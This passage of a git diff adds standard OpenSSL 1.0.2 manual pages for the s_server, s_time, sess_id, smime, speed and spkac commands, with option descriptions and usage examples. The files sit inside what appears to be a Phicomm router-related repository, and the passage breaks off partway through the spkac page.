+Use the PSK key B<key> when using a PSK cipher suite. The key is
+given as a hexadecimal number without leading 0x, for example -psk
+1a2b3c4d.
+
+=item B<-ssl2>, B<-ssl3>, B<-tls1>, B<-no_ssl2>, B<-no_ssl3>, B<-no_tls1>
+
+these options disable the use of certain SSL or TLS protocols. By default
+the initial handshake uses a method which should be compatible with all
+servers and permit them to use SSL v3, SSL v2 or TLS as appropriate.
+
+=item B<-bugs>
+
+there are several known bug in SSL and TLS implementations. Adding this
+option enables various workarounds.
+
+=item B<-hack>
+
+this option enables a further workaround for some some early Netscape
+SSL code (?).
+
+=item B<-cipher cipherlist>
+
+this allows the cipher list used by the server to be modified.  When
+the client sends a list of supported ciphers the first client cipher
+also included in the server list is used. Because the client specifies
+the preference order, the order of the server cipherlist irrelevant. See
+the B<ciphers> command for more information.
+
+=item B<-serverpref>
+
+use the server's cipher preferences, rather than the client's preferences.
+
+=item B<-tlsextdebug>
+
+print out a hex dump of any TLS extensions received from the server.
+
+=item B<-no_ticket>
+
+disable RFC4507bis session ticket support. 
+
+=item B<-www>
+
+sends a status message back to the client when it connects. This includes
+lots of information about the ciphers used and various session parameters.
+The output is in HTML format so this option will normally be used with a
+web browser.
+
+=item B<-WWW>
+
+emulates a simple web server. Pages will be resolved relative to the
+current directory, for example if the URL https://myhost/page.html is
+requested the file ./page.html will be loaded.
+
+=item B<-HTTP>
+
+emulates a simple web server. Pages will be resolved relative to the
+current directory, for example if the URL https://myhost/page.html is
+requested the file ./page.html will be loaded. The files loaded are
+assumed to contain a complete and correct HTTP response (lines that
+are part of the HTTP response line and headers must end with CRLF).
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<s_server>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=item B<-id_prefix arg>
+
+generate SSL/TLS session IDs prefixed by B<arg>. This is mostly useful
+for testing any SSL/TLS code (eg. proxies) that wish to deal with multiple
+servers, when each of which might be generating a unique range of session
+IDs (eg. with a certain prefix).
+
+=item B<-rand file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item B<-serverinfo file>
+
+a file containing one or more blocks of PEM data.  Each PEM block
+must encode a TLS ServerHello extension (2 bytes type, 2 bytes length,
+followed by "length" bytes of extension data).  If the client sends
+an empty TLS ClientHello extension matching the type, the corresponding
+ServerHello extension will be returned.
+
+=item B<-no_resumption_on_reneg>
+
+set SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION flag.
+
+=item B<-status>
+
+enables certificate status request support (aka OCSP stapling).
+
+=item B<-status_verbose>
+
+enables certificate status request support (aka OCSP stapling) and gives
+a verbose printout of the OCSP response.
+
+=item B<-status_timeout nsec>
+
+sets the timeout for OCSP response to B<nsec> seconds.
+
+=item B<-status_url url>
+
+sets a fallback responder URL to use if no responder URL is present in the
+server certificate. Without this option an error is returned if the server
+certificate does not contain a responder address.
+
+=item B<-nextprotoneg protocols>
+
+enable Next Protocol Negotiation TLS extension and provide a
+comma-separated list of supported protocol names.
+The list should contain most wanted protocols first.
+Protocol names are printable ASCII strings, for example "http/1.1" or
+"spdy/3".
+
+=back
+
+=head1 CONNECTED COMMANDS
+
+If a connection request is established with an SSL client and neither the
+B<-www> nor the B<-WWW> option has been used then normally any data received
+from the client is displayed and any key presses will be sent to the client. 
+
+Certain single letter commands are also recognized which perform special
+operations: these are listed below.
+
+=over 4
+
+=item B<q>
+
+end the current SSL connection but still accept new connections.
+
+=item B<Q>
+
+end the current SSL connection and exit.
+
+=item B<r>
+
+renegotiate the SSL session.
+
+=item B<R>
+
+renegotiate the SSL session and request a client certificate.
+
+=item B<P>
+
+send some plain text down the underlying TCP connection: this should
+cause the client to disconnect due to a protocol violation.
+
+=item B<S>
+
+print out some session cache status information.
+
+=back
+
+=head1 NOTES
+
+B<s_server> can be used to debug SSL clients. To accept connections from
+a web browser the command:
+
+ openssl s_server -accept 443 -www
+
+can be used for example.
+
+Most web browsers (in particular Netscape and MSIE) only support RSA cipher
+suites, so they cannot connect to servers which don't use a certificate
+carrying an RSA key or a version of OpenSSL with RSA disabled.
+
+Although specifying an empty list of CAs when requesting a client certificate
+is strictly speaking a protocol violation, some SSL clients interpret this to
+mean any CA is acceptable. This is useful for debugging purposes.
+
+The session parameters can printed out using the B<sess_id> program.
+
+=head1 BUGS
+
+Because this program has a lot of options and also because some of
+the techniques used are rather old, the C source of s_server is rather
+hard to read and not a model of how things should be done. A typical
+SSL server program would be much simpler.
+
+The output of common ciphers is wrong: it just gives the list of ciphers that
+OpenSSL recognizes and the client supports.
+
+There should be a way for the B<s_server> program to print out details of any
+unknown cipher suites a client says it supports.
+
+=head1 SEE ALSO
+
+L<sess_id(1)|sess_id(1)>, L<s_client(1)|s_client(1)>, L<ciphers(1)|ciphers(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/s_time.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/s_time.pod
new file mode 100644
index 0000000..5a38aa2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/s_time.pod
@@ -0,0 +1,173 @@
+
+=pod
+
+=head1 NAME
+
+s_time - SSL/TLS performance timing program
+
+=head1 SYNOPSIS
+
+B<openssl> B<s_time>
+[B<-connect host:port>]
+[B<-www page>]
+[B<-cert filename>]
+[B<-key filename>]
+[B<-CApath directory>]
+[B<-CAfile filename>]
+[B<-reuse>]
+[B<-new>]
+[B<-verify depth>]
+[B<-nbio>]
+[B<-time seconds>]
+[B<-ssl2>]
+[B<-ssl3>]
+[B<-bugs>]
+[B<-cipher cipherlist>]
+
+=head1 DESCRIPTION
+
+The B<s_client> command implements a generic SSL/TLS client which connects to a
+remote host using SSL/TLS. It can request a page from the server and includes
+the time to transfer the payload data in its timing measurements. It measures
+the number of connections within a given timeframe, the amount of data
+transferred (if any), and calculates the average time spent for one connection.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-connect host:port>
+
+This specifies the host and optional port to connect to.
+
+=item B<-www page>
+
+This specifies the page to GET from the server. A value of '/' gets the
+index.htm[l] page. If this parameter is not specified, then B<s_time> will only
+perform the handshake to establish SSL connections but not transfer any
+payload data.
+
+=item B<-cert certname>
+
+The certificate to use, if one is requested by the server. The default is
+not to use a certificate. The file is in PEM format.
+
+=item B<-key keyfile>
+
+The private key to use. If not specified then the certificate file will
+be used. The file is in PEM format.
+
+=item B<-verify depth>
+
+The verify depth to use. This specifies the maximum length of the
+server certificate chain and turns on server certificate verification.
+Currently the verify operation continues after errors so all the problems
+with a certificate chain can be seen. As a side effect the connection
+will never fail due to a server certificate verify failure.
+
+=item B<-CApath directory>
+
+The directory to use for server certificate verification. This directory
+must be in "hash format", see B<verify> for more information. These are
+also used when building the client certificate chain.
+
+=item B<-CAfile file>
+
+A file containing trusted certificates to use during server authentication
+and to use when attempting to build the client certificate chain.
+
+=item B<-new>
+
+performs the timing test using a new session ID for each connection.
+If neither B<-new> nor B<-reuse> are specified, they are both on by default
+and executed in sequence.
+
+=item B<-reuse>
+
+performs the timing test using the same session ID; this can be used as a test
+that session caching is working. If neither B<-new> nor B<-reuse> are
+specified, they are both on by default and executed in sequence.
+
+=item B<-nbio>
+
+turns on non-blocking I/O.
+
+=item B<-ssl2>, B<-ssl3>
+
+these options disable the use of certain SSL or TLS protocols. By default
+the initial handshake uses a method which should be compatible with all
+servers and permit them to use SSL v3, SSL v2 or TLS as appropriate.
+The timing program is not as rich in options to turn protocols on and off as
+the L<s_client(1)|s_client(1)> program and may not connect to all servers.
+
+Unfortunately there are a lot of ancient and broken servers in use which
+cannot handle this technique and will fail to connect. Some servers only
+work if TLS is turned off with the B<-ssl3> option; others
+will only support SSL v2 and may need the B<-ssl2> option.
+
+=item B<-bugs>
+
+there are several known bug in SSL and TLS implementations. Adding this
+option enables various workarounds.
+
+=item B<-cipher cipherlist>
+
+this allows the cipher list sent by the client to be modified. Although
+the server determines which cipher suite is used it should take the first
+supported cipher in the list sent by the client.
+See the L<ciphers(1)|ciphers(1)> command for more information.
+
+=item B<-time length>
+
+specifies how long (in seconds) B<s_time> should establish connections and
+optionally transfer payload data from a server. Server and client performance
+and the link speed determine how many connections B<s_time> can establish.
+
+=back
+
+=head1 NOTES
+
+B<s_client> can be used to measure the performance of an SSL connection.
+To connect to an SSL HTTP server and get the default page the command
+
+ openssl s_time -connect servername:443 -www / -CApath yourdir -CAfile yourfile.pem -cipher commoncipher [-ssl3]
+
+would typically be used (https uses port 443). 'commoncipher' is a cipher to
+which both client and server can agree, see the L<ciphers(1)|ciphers(1)> command
+for details.
+
+If the handshake fails then there are several possible causes, if it is
+nothing obvious like no client certificate then the B<-bugs>, B<-ssl2>,
+B<-ssl3> options can be tried
+in case it is a buggy server. In particular you should play with these
+options B<before> submitting a bug report to an OpenSSL mailing list.
+
+A frequent problem when attempting to get client certificates working
+is that a web client complains it has no certificates or gives an empty
+list to choose from. This is normally because the server is not sending
+the clients certificate authority in its "acceptable CA list" when it
+requests a certificate. By using L<s_client(1)|s_client(1)> the CA list can be
+viewed and checked. However some servers only request client authentication
+after a specific URL is requested. To obtain the list in this case it
+is necessary to use the B<-prexit> option of L<s_client(1)|s_client(1)> and
+send an HTTP request for an appropriate page.
+
+If a certificate is specified on the command line using the B<-cert>
+option it will not be used unless the server specifically requests
+a client certificate. Therefor merely including a client certificate
+on the command line is no guarantee that the certificate works.
+
+=head1 BUGS
+
+Because this program does not have all the options of the
+L<s_client(1)|s_client(1)> program to turn protocols on and off, you may not be
+able to measure the performance of all protocols with all servers.
+
+The B<-verify> option should really exit if the server verification
+fails.
+
+=head1 SEE ALSO
+
+L<s_client(1)|s_client(1)>, L<s_server(1)|s_server(1)>, L<ciphers(1)|ciphers(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/sess_id.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/sess_id.pod
new file mode 100644
index 0000000..9988d2c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/sess_id.pod
@@ -0,0 +1,151 @@
+
+=pod
+
+=head1 NAME
+
+sess_id - SSL/TLS session handling utility
+
+=head1 SYNOPSIS
+
+B<openssl> B<sess_id>
+[B<-inform PEM|DER>]
+[B<-outform PEM|DER>]
+[B<-in filename>]
+[B<-out filename>]
+[B<-text>]
+[B<-noout>]
+[B<-context ID>]
+
+=head1 DESCRIPTION
+
+The B<sess_id> process the encoded version of the SSL session structure
+and optionally prints out SSL session details (for example the SSL session
+master key) in human readable format. Since this is a diagnostic tool that
+needs some knowledge of the SSL protocol to use properly, most users will
+not need to use it.
+
+=over 4
+
+=item B<-inform DER|PEM>
+
+This specifies the input format. The B<DER> option uses an ASN1 DER encoded
+format containing session details. The precise format can vary from one version
+to the next.  The B<PEM> form is the default format: it consists of the B<DER>
+format base64 encoded with additional header and footer lines.
+
+=item B<-outform DER|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read session information from or standard
+input by default.
+
+=item B<-out filename>
+
+This specifies the output filename to write session information to or standard
+output if this option is not specified.
+
+=item B<-text>
+
+prints out the various public or private key components in
+plain text in addition to the encoded version. 
+
+=item B<-cert>
+
+if a certificate is present in the session it will be output using this option,
+if the B<-text> option is also present then it will be printed out in text form.
+
+=item B<-noout>
+
+this option prevents output of the encoded version of the session.
+
+=item B<-context ID>
+
+this option can set the session id so the output session information uses the
+supplied ID. The ID can be any string of characters. This option wont normally
+be used.
+
+=back
+
+=head1 OUTPUT
+
+Typical output:
+
+ SSL-Session:
+     Protocol  : TLSv1
+     Cipher    : 0016
+     Session-ID: 871E62626C554CE95488823752CBD5F3673A3EF3DCE9C67BD916C809914B40ED
+     Session-ID-ctx: 01000000
+     Master-Key: A7CEFC571974BE02CAC305269DC59F76EA9F0B180CB6642697A68251F2D2BB57E51DBBB4C7885573192AE9AEE220FACD
+     Key-Arg   : None
+     Start Time: 948459261
+     Timeout   : 300 (sec)
+     Verify return code 0 (ok)
+
+Theses are described below in more detail.
+
+=over 4
+
+=item B<Protocol>
+
+this is the protocol in use TLSv1, SSLv3 or SSLv2.
+
+=item B<Cipher>
+
+the cipher used this is the actual raw SSL or TLS cipher code, see the SSL
+or TLS specifications for more information.
+
+=item B<Session-ID>
+
+the SSL session ID in hex format.
+
+=item B<Session-ID-ctx>
+
+the session ID context in hex format.
+
+=item B<Master-Key>
+
+this is the SSL session master key.
+
+=item B<Key-Arg>
+
+the key argument, this is only used in SSL v2.
+
+=item B<Start Time>
+
+this is the session start time represented as an integer in standard Unix format.
+
+=item B<Timeout>
+
+the timeout in seconds.
+
+=item B<Verify return code>
+
+this is the return code when an SSL client certificate is verified.
+
+=back
+
+=head1 NOTES
+
+The PEM encoded session format uses the header and footer lines:
+
+ -----BEGIN SSL SESSION PARAMETERS-----
+ -----END SSL SESSION PARAMETERS-----
+
+Since the SSL session output contains the master key it is possible to read the contents
+of an encrypted session using this information. Therefore appropriate security precautions
+should be taken if the information is being output by a "real" application. This is
+however strongly discouraged and should only be used for debugging purposes.
+
+=head1 BUGS
+
+The cipher and start time should be printed out in human readable form.
+
+=head1 SEE ALSO
+
+L<ciphers(1)|ciphers(1)>, L<s_server(1)|s_server(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/smime.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/smime.pod
new file mode 100644
index 0000000..d39a59a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/smime.pod
@@ -0,0 +1,445 @@
+=pod
+
+=head1 NAME
+
+smime - S/MIME utility
+
+=head1 SYNOPSIS
+
+B<openssl> B<smime>
+[B<-encrypt>]
+[B<-decrypt>]
+[B<-sign>]
+[B<-resign>]
+[B<-verify>]
+[B<-pk7out>]
+[B<-[cipher]>]
+[B<-in file>]
+[B<-certfile file>]
+[B<-signer file>]
+[B<-recip  file>]
+[B<-inform SMIME|PEM|DER>]
+[B<-passin arg>]
+[B<-inkey file>]
+[B<-out file>]
+[B<-outform SMIME|PEM|DER>]
+[B<-content file>]
+[B<-to addr>]
+[B<-from ad>]
+[B<-subject s>]
+[B<-text>]
+[B<-indef>]
+[B<-noindef>]
+[B<-stream>]
+[B<-rand file(s)>]
+[B<-md digest>]
+[cert.pem]...
+
+=head1 DESCRIPTION
+
+The B<smime> command handles S/MIME mail. It can encrypt, decrypt, sign and
+verify S/MIME messages.
+
+=head1 COMMAND OPTIONS
+
+There are six operation options that set the type of operation to be performed.
+The meaning of the other options varies according to the operation type.
+
+=over 4
+
+=item B<-encrypt>
+
+encrypt mail for the given recipient certificates. Input file is the message
+to be encrypted. The output file is the encrypted mail in MIME format.
+
+=item B<-decrypt>
+
+decrypt mail using the supplied certificate and private key. Expects an
+encrypted mail message in MIME format for the input file. The decrypted mail
+is written to the output file.
+
+=item B<-sign>
+
+sign mail using the supplied certificate and private key. Input file is
+the message to be signed. The signed message in MIME format is written
+to the output file.
+
+=item B<-verify>
+
+verify signed mail. Expects a signed mail message on input and outputs
+the signed data. Both clear text and opaque signing is supported.
+
+=item B<-pk7out>
+
+takes an input message and writes out a PEM encoded PKCS#7 structure.
+
+=item B<-resign>
+
+resign a message: take an existing message and one or more new signers.
+
+=item B<-in filename>
+
+the input message to be encrypted or signed or the MIME message to
+be decrypted or verified.
+
+=item B<-inform SMIME|PEM|DER>
+
+this specifies the input format for the PKCS#7 structure. The default
+is B<SMIME> which reads an S/MIME format message. B<PEM> and B<DER>
+format change this to expect PEM and DER format PKCS#7 structures
+instead. This currently only affects the input format of the PKCS#7
+structure, if no PKCS#7 structure is being input (for example with
+B<-encrypt> or B<-sign>) this option has no effect.
+
+=item B<-out filename>
+
+the message text that has been decrypted or verified or the output MIME
+format message that has been signed or verified.
+
+=item B<-outform SMIME|PEM|DER>
+
+this specifies the output format for the PKCS#7 structure. The default
+is B<SMIME> which write an S/MIME format message. B<PEM> and B<DER>
+format change this to write PEM and DER format PKCS#7 structures
+instead. This currently only affects the output format of the PKCS#7
+structure, if no PKCS#7 structure is being output (for example with
+B<-verify> or B<-decrypt>) this option has no effect.
+
+=item B<-stream -indef -noindef>
+
+the B<-stream> and B<-indef> options are equivalent and enable streaming I/O
+for encoding operations. This permits single pass processing of data without
+the need to hold the entire contents in memory, potentially supporting very
+large files. Streaming is automatically set for S/MIME signing with detached
+data if the output format is B<SMIME> it is currently off by default for all
+other operations.
+
+=item B<-noindef>
+
+disable streaming I/O where it would produce and indefinite length constructed
+encoding. This option currently has no effect. In future streaming will be
+enabled by default on all relevant operations and this option will disable it.
+
+=item B<-content filename>
+
+This specifies a file containing the detached content, this is only
+useful with the B<-verify> command. This is only usable if the PKCS#7
+structure is using the detached signature form where the content is
+not included. This option will override any content if the input format
+is S/MIME and it uses the multipart/signed MIME content type.
+
+=item B<-text>
+
+this option adds plain text (text/plain) MIME headers to the supplied
+message if encrypting or signing. If decrypting or verifying it strips
+off text headers: if the decrypted or verified message is not of MIME 
+type text/plain then an error occurs.
+
+=item B<-CAfile file>
+
+a file containing trusted CA certificates, only used with B<-verify>.
+
+=item B<-CApath dir>
+
+a directory containing trusted CA certificates, only used with
+B<-verify>. This directory must be a standard certificate directory: that
+is a hash of each subject name (using B<x509 -hash>) should be linked
+to each certificate.
+
+=item B<-md digest>
+
+digest algorithm to use when signing or resigning. If not present then the
+default digest algorithm for the signing key will be used (usually SHA1).
+
+=item B<-[cipher]>
+
+the encryption algorithm to use. For example DES  (56 bits) - B<-des>,
+triple DES (168 bits) - B<-des3>,
+EVP_get_cipherbyname() function) can also be used preceded by a dash, for 
+example B<-aes_128_cbc>. See L<B<enc>|enc(1)> for list of ciphers
+supported by your version of OpenSSL.
+
+If not specified triple DES is used. Only used with B<-encrypt>.
+
+=item B<-nointern>
+
+when verifying a message normally certificates (if any) included in
+the message are searched for the signing certificate. With this option
+only the certificates specified in the B<-certfile> option are used.
+The supplied certificates can still be used as untrusted CAs however.
+
+=item B<-noverify>
+
+do not verify the signers certificate of a signed message.
+
+=item B<-nochain>
+
+do not do chain verification of signers certificates: that is don't
+use the certificates in the signed message as untrusted CAs.
+
+=item B<-nosigs>
+
+don't try to verify the signatures on the message.
+
+=item B<-nocerts>
+
+when signing a message the signer's certificate is normally included
+with this option it is excluded. This will reduce the size of the
+signed message but the verifier must have a copy of the signers certificate
+available locally (passed using the B<-certfile> option for example).
+
+=item B<-noattr>
+
+normally when a message is signed a set of attributes are included which
+include the signing time and supported symmetric algorithms. With this
+option they are not included.
+
+=item B<-binary>
+
+normally the input message is converted to "canonical" format which is
+effectively using CR and LF as end of line: as required by the S/MIME
+specification. When this option is present no translation occurs. This
+is useful when handling binary data which may not be in MIME format.
+
+=item B<-nodetach>
+
+when signing a message use opaque signing: this form is more resistant
+to translation by mail relays but it cannot be read by mail agents that
+do not support S/MIME.  Without this option cleartext signing with
+the MIME type multipart/signed is used.
+
+=item B<-certfile file>
+
+allows additional certificates to be specified. When signing these will
+be included with the message. When verifying these will be searched for
+the signers certificates. The certificates should be in PEM format.
+
+=item B<-signer file>
+
+a signing certificate when signing or resigning a message, this option can be
+used multiple times if more than one signer is required. If a message is being
+verified then the signers certificates will be written to this file if the
+verification was successful.
+
+=item B<-recip file>
+
+the recipients certificate when decrypting a message. This certificate
+must match one of the recipients of the message or an error occurs.
+
+=item B<-inkey file>
+
+the private key to use when signing or decrypting. This must match the
+corresponding certificate. If this option is not specified then the
+private key must be included in the certificate file specified with
+the B<-recip> or B<-signer> file. When signing this option can be used
+multiple times to specify successive keys.
+
+=item B<-passin arg>
+
+the private key password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-rand file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item B<cert.pem...>
+
+one or more certificates of message recipients: used when encrypting
+a message. 
+
+=item B<-to, -from, -subject>
+
+the relevant mail headers. These are included outside the signed
+portion of a message so they may be included manually. If signing
+then many S/MIME mail clients check the signers certificate's email
+address matches that specified in the From: address.
+
+=item B<-purpose, -ignore_critical, -issuer_checks, -crl_check, -crl_check_all, -policy_check, -extended_crl, -x509_strict, -policy -check_ss_sig>
+
+Set various options of certificate chain verification. See
+L<B<verify>|verify(1)> manual page for details.
+
+=back
+
+=head1 NOTES
+
+The MIME message must be sent without any blank lines between the
+headers and the output. Some mail programs will automatically add
+a blank line. Piping the mail directly to sendmail is one way to
+achieve the correct format.
+
+The supplied message to be signed or encrypted must include the
+necessary MIME headers or many S/MIME clients wont display it
+properly (if at all). You can use the B<-text> option to automatically
+add plain text headers.
+
+A "signed and encrypted" message is one where a signed message is
+then encrypted. This can be produced by encrypting an already signed
+message: see the examples section.
+
+This version of the program only allows one signer per message but it
+will verify multiple signers on received messages. Some S/MIME clients
+choke if a message contains multiple signers. It is possible to sign
+messages "in parallel" by signing an already signed message.
+
+The options B<-encrypt> and B<-decrypt> reflect common usage in S/MIME
+clients. Strictly speaking these process PKCS#7 enveloped data: PKCS#7
+encrypted data is used for other purposes.
+
+The B<-resign> option uses an existing message digest when adding a new
+signer. This means that attributes must be present in at least one existing
+signer using the same message digest or this operation will fail.
+
+The B<-stream> and B<-indef> options enable experimental streaming I/O support.
+As a result the encoding is BER using indefinite length constructed encoding
+and no longer DER. Streaming is supported for the B<-encrypt> operation and the
+B<-sign> operation if the content is not detached.
+
+Streaming is always used for the B<-sign> operation with detached data but
+since the content is no longer part of the PKCS#7 structure the encoding
+remains DER.
+
+=head1 EXIT CODES
+
+=over 4
+
+=item Z<>0
+
+the operation was completely successfully.
+
+=item Z<>1
+
+an error occurred parsing the command options.
+
+=item Z<>2
+
+one of the input files could not be read.
+
+=item Z<>3
+
+an error occurred creating the PKCS#7 file or when reading the MIME
+message.
+
+=item Z<>4
+
+an error occurred decrypting or verifying the message.
+
+=item Z<>5
+
+the message was verified correctly but an error occurred writing out
+the signers certificates.
+
+=back
+
+=head1 EXAMPLES
+
+Create a cleartext signed message:
+
+ openssl smime -sign -in message.txt -text -out mail.msg \
+	-signer mycert.pem
+
+Create an opaque signed message:
+
+ openssl smime -sign -in message.txt -text -out mail.msg -nodetach \
+	-signer mycert.pem
+
+Create a signed message, include some additional certificates and
+read the private key from another file:
+
+ openssl smime -sign -in in.txt -text -out mail.msg \
+	-signer mycert.pem -inkey mykey.pem -certfile mycerts.pem
+
+Create a signed message with two signers:
+
+ openssl smime -sign -in message.txt -text -out mail.msg \
+	-signer mycert.pem -signer othercert.pem
+
+Send a signed message under Unix directly to sendmail, including headers:
+
+ openssl smime -sign -in in.txt -text -signer mycert.pem \
+	-from steve@openssl.org -to someone@somewhere \
+	-subject "Signed message" | sendmail someone@somewhere
+
+Verify a message and extract the signer's certificate if successful:
+
+ openssl smime -verify -in mail.msg -signer user.pem -out signedtext.txt
+
+Send encrypted mail using triple DES:
+
+ openssl smime -encrypt -in in.txt -from steve@openssl.org \
+	-to someone@somewhere -subject "Encrypted message" \
+	-des3 user.pem -out mail.msg
+
+Sign and encrypt mail:
+
+ openssl smime -sign -in ml.txt -signer my.pem -text \
+	| openssl smime -encrypt -out mail.msg \
+	-from steve@openssl.org -to someone@somewhere \
+	-subject "Signed and Encrypted message" -des3 user.pem
+
+Note: the encryption command does not include the B<-text> option because the
+message being encrypted already has MIME headers.
+
+Decrypt mail:
+
+ openssl smime -decrypt -in mail.msg -recip mycert.pem -inkey key.pem
+
+The output from Netscape form signing is a PKCS#7 structure with the
+detached signature format. You can use this program to verify the
+signature by line wrapping the base64 encoded structure and surrounding
+it with:
+
+ -----BEGIN PKCS7-----
+ -----END PKCS7-----
+
+and using the command: 
+
+ openssl smime -verify -inform PEM -in signature.pem -content content.txt
+
+Alternatively you can base64 decode the signature and use:
+
+ openssl smime -verify -inform DER -in signature.der -content content.txt
+
+Create an encrypted message using 128 bit Camellia:
+
+ openssl smime -encrypt -in plain.txt -camellia128 -out mail.msg cert.pem
+
+Add a signer to an existing message:
+
+ openssl smime -resign -in mail.msg -signer newsign.pem -out mail2.msg
+
+=head1 BUGS
+
+The MIME parser isn't very clever: it seems to handle most messages that I've
+thrown at it but it may choke on others.
+
+The code currently will only write out the signer's certificate to a file: if
+the signer has a separate encryption certificate this must be manually
+extracted. There should be some heuristic that determines the correct
+encryption certificate.
+
+Ideally a database should be maintained of a certificates for each email
+address.
+
+The code doesn't currently take note of the permitted symmetric encryption
+algorithms as supplied in the SMIMECapabilities signed attribute. This means the
+user has to manually include the correct encryption algorithm. It should store
+the list of permitted ciphers in a database and only use those.
+
+No revocation checking is done on the signer's certificate.
+
+The current code can only handle S/MIME v2 messages, the more complex S/MIME v3
+structures may cause parsing errors.
+
+=head1 HISTORY
+
+The use of multiple B<-signer> options and the B<-resign> command were first
+added in OpenSSL 1.0.0
+
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/speed.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/speed.pod
new file mode 100644
index 0000000..1cd1998
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/speed.pod
@@ -0,0 +1,59 @@
+=pod
+
+=head1 NAME
+
+speed - test library performance
+
+=head1 SYNOPSIS
+
+B<openssl speed>
+[B<-engine id>]
+[B<md2>]
+[B<mdc2>]
+[B<md5>]
+[B<hmac>]
+[B<sha1>]
+[B<rmd160>]
+[B<idea-cbc>]
+[B<rc2-cbc>]
+[B<rc5-cbc>]
+[B<bf-cbc>]
+[B<des-cbc>]
+[B<des-ede3>]
+[B<rc4>]
+[B<rsa512>]
+[B<rsa1024>]
+[B<rsa2048>]
+[B<rsa4096>]
+[B<dsa512>]
+[B<dsa1024>]
+[B<dsa2048>]
+[B<idea>]
+[B<rc2>]
+[B<des>]
+[B<rsa>]
+[B<blowfish>]
+
+=head1 DESCRIPTION
+
+This command is used to test the performance of cryptographic algorithms.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<speed>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=item B<[zero or more test algorithms]>
+
+If any options are given, B<speed> tests those algorithms, otherwise all of
+the above are tested.
+
+=back
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/spkac.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/spkac.pod
new file mode 100644
index 0000000..97fb80e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/spkac.pod
@@ -0,0 +1,133 @@
+=pod
+
+=head1 NAME
+
+spkac - SPKAC printing and generating utility
+
+=head1 SYNOPSIS
+
+B<openssl> B<spkac>
+[B<-in filename>]
+[B<-out filename>]
+[B<-key keyfile>]
+[B<-passin arg>]
+[B<-challenge string>]
+[B<-pubkey>]
+[B<-spkac spkacname>]
+[B<-spksect section>]
+[B<-noout>]
+[B<-verify>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The B<spkac> command processes Netscape signed public key and challenge
+(SPKAC) files. It can print out their contents, verify the signature and
+produce its own SPKACs from a supplied private key.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-in filename>
+
+This specifies the input filename to read from or standard input if this
+option is not specified. Ignored if the B<-key> option is used.
+
+=item B<-out filename>
+
+specifies the output filename to write to or standard output by
+default.
+
+=item B<-key keyfile>
+
+create an SPKAC file using the private key in B<keyfile>. The
+B<-in>, B<-noout>, B<-spksect> and B<-verify> options are ignored if
+present.
+
+=item B<-passin password>
+
+the input file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-challenge string>
+
+specifies the challenge string if an SPKAC is being created.
+
+=item B<-spkac spkacname>
+
+allows an alternative name form the variable containing the
+SPKAC. The default is "SPKAC". This option affects both
+generated and input SPKAC files.
+
+=item B<-spksect section>
+
+allows an alternative name form the section containing the
+SPKAC. The default is the default section.
+
+=item B<-noout>
+
+don't output the text version of the SPKAC (not used if an
+SPKAC is being created).
+
+=item B<-pubkey>
+
+output the public key of an SPKAC (not used if an SPKAC is
+being created).
+
+=item B<-verify>
+
+verifies the digital signature on the supplied SPKAC.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<spkac>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head1 EXAMPLES
+
+Print out the contents of an SPKAC:
+
+ openssl spkac -in spkac.cnf
+
+Verify the signature of an SPKAC:
+
+ openssl spkac -in spkac.cnf -noout -verify
+
+Create an SPKAC using the challenge string "hello":
+
+ openssl spkac -key key.pem -challenge hello -out spkac.cnf
+
+Example of an SPKAC, (long lines split up for clarity):
+
